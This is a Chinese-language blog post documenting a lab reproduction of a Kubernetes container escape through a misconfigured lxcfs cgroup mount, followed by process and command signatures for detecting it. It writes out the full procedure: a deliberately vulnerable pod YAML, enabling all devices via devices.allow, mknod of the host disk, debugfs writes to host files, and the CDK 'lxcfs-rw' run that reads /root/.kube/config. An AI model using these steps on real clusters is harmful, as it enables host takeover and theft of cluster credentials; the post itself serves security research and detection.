<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><meta name="author" content="Sally"><title>lxcfs cgroup错误配置容器逃逸 · Sally's Blog</title><meta name="description" content="实验环境Ubuntu 20.04
docker 20.10.21
kubernetes 1.22.7
实验步骤安装lxcfs1apt install lxcfs

验证安装

运行lxcfs
123systemctl deamon-reloadsystemctl start lxcfssystemc"><meta name="keywords" content="Blog,博客,Hexo"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="renderer" content="webkit"><link rel="shortcut icon" type="image/x-icon" href="/images/favicon.webp"><link rel="stylesheet" href="/css/style.css"><link rel="stylesheet" href="/css/blog_basic.css"><link rel="stylesheet" href="/css/font-awesome.min.css"><link rel="stylesheet" href="/css/insight.css"><link rel="stylesheet" href="/css/search.css"><link rel="alternate" type="application/atom+xml" title="ATOM 1.0" href="/atom.xml"><script src="/js/jquery.js"></script><meta name="generator" content="Hexo 6.3.0"></head><body><div class="page-top animated fadeInDown"><div class="nav"><li> <a href="/">主页</a></li><li> <a href="/archives">归档</a></li><li> <a href="/tags">标签</a></li><li> <a href="/about">关于</a></li><li> <a href="/links">友链</a></li></div><div class="information"><div class="nav_right_btn"><li><a class="fa fa-chevron-left" onclick="window.history.go(-1)"> </a></li><li><a class="fa fa-search" onclick="openWindow();"></a></li></div><div class="avatar"><img src="/images/kabi.jpg"></div></div></div><div class="sidebar animated fadeInDown"><div class="sidebar-top"><div class="logo-title"><div class="title"><img src="/images/kabi.jpg" style="width:220px;" alt="favicon"><h3 title=""><a href="/">Sally's Blog</a></h3><div class="description"><p>A simple and beautiful blog</p></div></div><ul class="social-links"><li><a target="_blank" rel="noopener" href="https://github.com/phoenixmerk"><i class="fa fa-github"></i></a></li><li><a href="mailto:yourname@example.com"><i class="fa fa-envelope"></i></a></li><li><a target="_blank" rel="noopener" href="https://zhihu.com/people/jin-xin-4-68"><i class="fa fa-mortar-board"></i></a></li></ul><iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width="220" height="86" src="//music.163.com/outchain/player?type=2&amp;id=1293913379&amp;auto=1&amp;height=66&amp;&amp;loop=1"></iframe></div></div><div class="footer"><div class="p"> <span> 全站CC-BY-SA-3.0 </span><i class="fa fa-star"></i><span> Sally</span></div><div class="by_farbox"><span>Powered by </span><a href="https://hexo.io/zh-cn/" target="_blank">Hexo </a><span> & </span><span>Anatolo </span></div><div class="beian"></div></div></div><div class="main"><div class="autopagerize_page_element"><div class="content"><div class="post-page"><div class="post animated fadeInDown"><div class="post-title"><h3><a>lxcfs cgroup错误配置容器逃逸</a></h3></div><div class="post-content"><p><p><a href="https://phoenixmerk.github.io/"><img src="https://img.shields.io/badge/%E4%BD%9C%E8%80%85-phoenixmerk-blue.svg" alt="img"></a></p>
<h2 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>实验环境</h2><p>Ubuntu 20.04</p>
<p>docker 20.10.21</p>
<p>kubernetes 1.22.7</p>
<h2 id="实验步骤"><a href="#实验步骤" class="headerlink" title="实验步骤"></a>实验步骤</h2><h3 id="安装lxcfs"><a href="#安装lxcfs" class="headerlink" title="安装lxcfs"></a>安装lxcfs</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt install lxcfs</span><br></pre></td></tr></table></figure>

<p>验证安装</p>
<p><img src="https://safedog-hq.oss-cn-guangzhou.aliyuncs.com/metarget/image-20240116151755434.png" alt="image-20240116151755434"></p>
<p>运行lxcfs</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">systemctl deamon-reload</span><br><span class="line">systemctl start lxcfs</span><br><span class="line">systemctl status lxcfs</span><br></pre></td></tr></table></figure>

<p>或者手动运行</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">lxcfs /var/lib/lxcfs</span><br></pre></td></tr></table></figure>

<p><img src="https://safedog-hq.oss-cn-guangzhou.aliyuncs.com/metarget/image-20240116152153601.png" alt="image-20240116152153601"></p>
<h3 id="部署带有漏洞的pod"><a href="#部署带有漏洞的pod" class="headerlink" title="部署带有漏洞的pod"></a>部署带有漏洞的pod</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">kubectl create ns cdk-test</span><br><span class="line">kubectl apply -f cdk-nginx.yaml</span><br></pre></td></tr></table></figure>

<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">apiVersion:</span> <span class="string">apps/v1</span></span><br><span class="line"><span class="attr">kind:</span> <span class="string">Deployment</span></span><br><span class="line"><span class="attr">metadata:</span></span><br><span class="line">  <span class="attr">name:</span> <span class="string">cdk-nginx</span></span><br><span class="line">  <span class="attr">namespace:</span> <span class="string">cdk-test</span></span><br><span class="line">  <span class="attr">labels:</span></span><br><span class="line">    <span class="attr">app:</span> <span class="string">nginx</span></span><br><span class="line"><span class="attr">spec:</span></span><br><span class="line">  <span class="attr">replicas:</span> <span class="number">1</span></span><br><span class="line">  <span class="attr">selector:</span></span><br><span class="line">    <span class="attr">matchLabels:</span></span><br><span class="line">      <span class="attr">app:</span> <span class="string">nginx</span></span><br><span class="line">  <span class="attr">template:</span></span><br><span class="line">    <span class="attr">metadata:</span></span><br><span class="line">      <span class="attr">labels:</span></span><br><span class="line">        <span class="attr">app:</span> <span class="string">nginx</span></span><br><span class="line">    <span class="attr">spec:</span></span><br><span class="line">      <span class="attr">containers:</span></span><br><span class="line">      <span class="bullet">-</span> <span class="attr">name:</span> <span class="string">cdk-nginx</span></span><br><span class="line">        <span class="attr">image:</span> <span class="string">nginx:latest</span></span><br><span class="line">        <span class="attr">volumeMounts:</span></span><br><span class="line">        <span class="bullet">-</span> <span class="attr">name:</span> <span class="string">lxcfs</span></span><br><span class="line">          <span class="attr">mountPath:</span> <span class="string">/tmp</span></span><br><span class="line">      <span class="attr">volumes:</span>                          <span class="comment"># 挂载lxcfs目录</span></span><br><span class="line">        <span class="bullet">-</span> <span class="attr">name:</span> <span class="string">lxcfs</span></span><br><span class="line">          <span class="attr">hostPath:</span></span><br><span class="line">            <span class="attr">path:</span> <span class="string">/var/lib/lxcfs</span></span><br><span class="line">            <span class="attr">type:</span> <span class="string">Directory</span></span><br></pre></td></tr></table></figure>

<p> 验证部署</p>
<p><img src="https://safedog-hq.oss-cn-guangzhou.aliyuncs.com/metarget/image-20240116153936192.png" alt="image-20240116153936192"></p>
<h3 id="进入pod配置环境"><a href="#进入pod配置环境" class="headerlink" title="进入pod配置环境"></a>进入pod配置环境</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kubectl <span class="built_in">exec</span> -it cdk-nginx-5d49fc6b5d-87z77 -n cdk-test /bin/bash</span><br></pre></td></tr></table></figure>

<p><img src="https://safedog-hq.oss-cn-guangzhou.aliyuncs.com/metarget/image-20240116154108512.png" alt="image-20240116154108512"></p>
<p>允许lxcfs查看所有设备，这个路径是在进入&#x2F;tmp&#x2F;cgroup&#x2F;devices&#x2F;kubepods.slice&#x2F;kubepods-besteffort.slice后一直深入后得到的，需要依照情况而定</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> a &gt; /tmp/cgroup/devices/kubepods.slice/kubepods-besteffort.slice/kubepods-besteffort-pod4cde57c0_bb78_4ff5_8ce7_cc54c1521ee1.slice/docker-080ea39f7efecf95db7137341f951f30b9ef96aa54566841daa2a22649440bf9.scope/devices.allow</span><br></pre></td></tr></table></figure>

<p>查看&#x2F;etc目录的node号和文件系统类型，确认node号为253:0 文件系统该类型为ext4</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> /proc/self/mountinfo |grep /etc</span><br></pre></td></tr></table></figure>

<p><img src="https://safedog-hq.oss-cn-guangzhou.aliyuncs.com/metarget/image-20240116160522696.png" alt="image-20240116160522696"></p>
<h3 id="创建设备进行逃逸"><a href="#创建设备进行逃逸" class="headerlink" title="创建设备进行逃逸"></a>创建设备进行逃逸</h3><p>设备文件名称<code>cdk-test</code>、文件类型<code>b</code>为块设备、主设备号<code>253</code>、次设备号<code>0</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">mknod</span> cdk-test b 253 0</span><br></pre></td></tr></table></figure>

<p>进行调试，通过ls命令和write命令即可读写文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">debugfs -w cdk-test</span><br><span class="line"><span class="built_in">cd</span> /root</span><br><span class="line"><span class="built_in">ls</span></span><br></pre></td></tr></table></figure>

<p><img src="https://safedog-hq.oss-cn-guangzhou.aliyuncs.com/metarget/image-20240116161450819.png" alt="image-20240116161450819"></p>
<h3 id="CDK方式"><a href="#CDK方式" class="headerlink" title="CDK方式"></a>CDK方式</h3><p>（这里换成了ubuntu镜像便于后续看进程细节）</p>
<p>运行cdk逃逸脚本</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./cdk run lxcfs-rw</span><br></pre></td></tr></table></figure>

<p><img src="https://safedog-hq.oss-cn-guangzhou.aliyuncs.com/metarget/image-20240116183339381.png" alt="image-20240116183339381"></p>
<p>运行debugfs查看host_dev文件系统</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">debugfs -w host_dev</span><br><span class="line"><span class="built_in">cat</span> /root/.kube/config</span><br></pre></td></tr></table></figure>

<p><img src="https://safedog-hq.oss-cn-guangzhou.aliyuncs.com/metarget/image-20240116183421548.png" alt="image-20240116183421548"></p>
<h2 id="特征提取"><a href="#特征提取" class="headerlink" title="特征提取"></a>特征提取</h2><h3 id="进程特征"><a href="#进程特征" class="headerlink" title="进程特征"></a>进程特征</h3><p>（这里换成了ubuntu镜像好查看进程细节）</p>
<p>这个不是短进程，查看进程信息，&#x2F;bin&#x2F;bash为父进程，debugfs为子进程（参数为-w cdk-test，如果是使用cdk则参数固定为-w host_dev）</p>
<p><img src="https://safedog-hq.oss-cn-guangzhou.aliyuncs.com/metarget/image-20240116175344403.png" alt="image-20240116175344403"></p>
<h3 id="命令特征"><a href="#命令特征" class="headerlink" title="命令特征"></a>命令特征</h3><p>以下的命令都是固定的，也是由于CDK内置的原因</p>
<p>.&#x2F;cdk run lxcfs-rw</p>
<p> debugfs -w host_dev</p>
</p><div class="tip">本文采用CC-BY-SA-3.0协议，转载请注明出处<br>Author: Sally</div></div><div class="post-footer"><div class="meta"><div class="info"><i class="fa fa-sun-o"></i><span class="date">2024-01-16</span><i class="fa fa-tag"></i><a class="tag" href="/tags/容器安全/" title="容器安全">容器安全 </a><span class="leancloud_visitors"></span><span>About 499 words, 1 min 39 sec  read</span></div></div></div></div><div class="share"><div class="evernote"><a class="fa fa-bookmark" href="" onclick="javascript:join_favorite()" ref="sidebar"></a></div><div class="weibo"><a class="fa fa-weibo" href="javascript:void((function(s,d,e){try{}catch(e){}var f='http://service.weibo.com/share/share.php?',u=d.location.href,p=['url=',e(u),'&amp;title=',e(d.title),'&amp;appkey=2924220432'].join('');function a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=620,height=450,left=',(s.width-620)/2,',top=',(s.height-450)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent)){setTimeout(a,0)}else{a()}})(screen,document,encodeURIComponent));"></a></div><div class="twitter"><a class="fa fa-twitter" target="_blank" rel="noopener" href="http://twitter.com/home?status=,https://phoenixmerk.github.io/2024/01/16/lxcfs cgroup错误配置容器逃逸/,Sally's Blog,lxcfs cgroup错误配置容器逃逸,;"></a></div></div><div class="pagination"><ul class="clearfix"><li class="pre pagbuttons"><a class="btn" role="navigation" href="/2024/01/17/%E8%87%AA%E5%8A%A8%E5%8C%96%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7CDK%E7%89%B9%E5%BE%81%E6%A3%80%E6%B5%8B/" title="自动化渗透工具CDK特征检测">Previous</a></li><li class="next pagbuttons"><a class="btn" role="navigation" href="/2023/12/30/%E4%BB%8EEKS-CTF%E7%9C%8B%E4%BA%91%E5%8E%9F%E7%94%9F%E5%AE%89%E5%85%A8/" title="从EKS-CTF看云原生安全">Next</a></li></ul></div><script src="/js/visitors.js"></script></div></div></div></div><script src="/js/jquery-migrate-1.2.1.min.js"></script><script src="/js/jquery.appear.js"></script><script src="/js/add-bookmark.js"></script><script>(function(window){var INSIGHT_CONFIG={TRANSLATION:{POSTS:"Posts",PAGES:"Pages",CATEGORIES:"Categories",TAGS:"Tags",UNTITLED:"(Untitled)",},CONTENT_URL:"/content.json",};window.INSIGHT_CONFIG=INSIGHT_CONFIG})(window);</script><script src="/js/insight.js" defer></script><div class="searchbox ins-search"><div class="searchbox-container ins-search-container"><div class="searchbox-input-wrapper"><input class="searchbox-input ins-search-input" type="text" placeholder="Search..."><span class="searchbox-close"><a class="fa fa-times-circle" onclick="closeWindow();"></a></span></div><div class="searchbox-result-wrapper ins-section-wrapper"><div class="ins-section-container"><p>Seraching...</p></div></div></div></div><script src="/js/baidu-tongji.js"></script></body></html>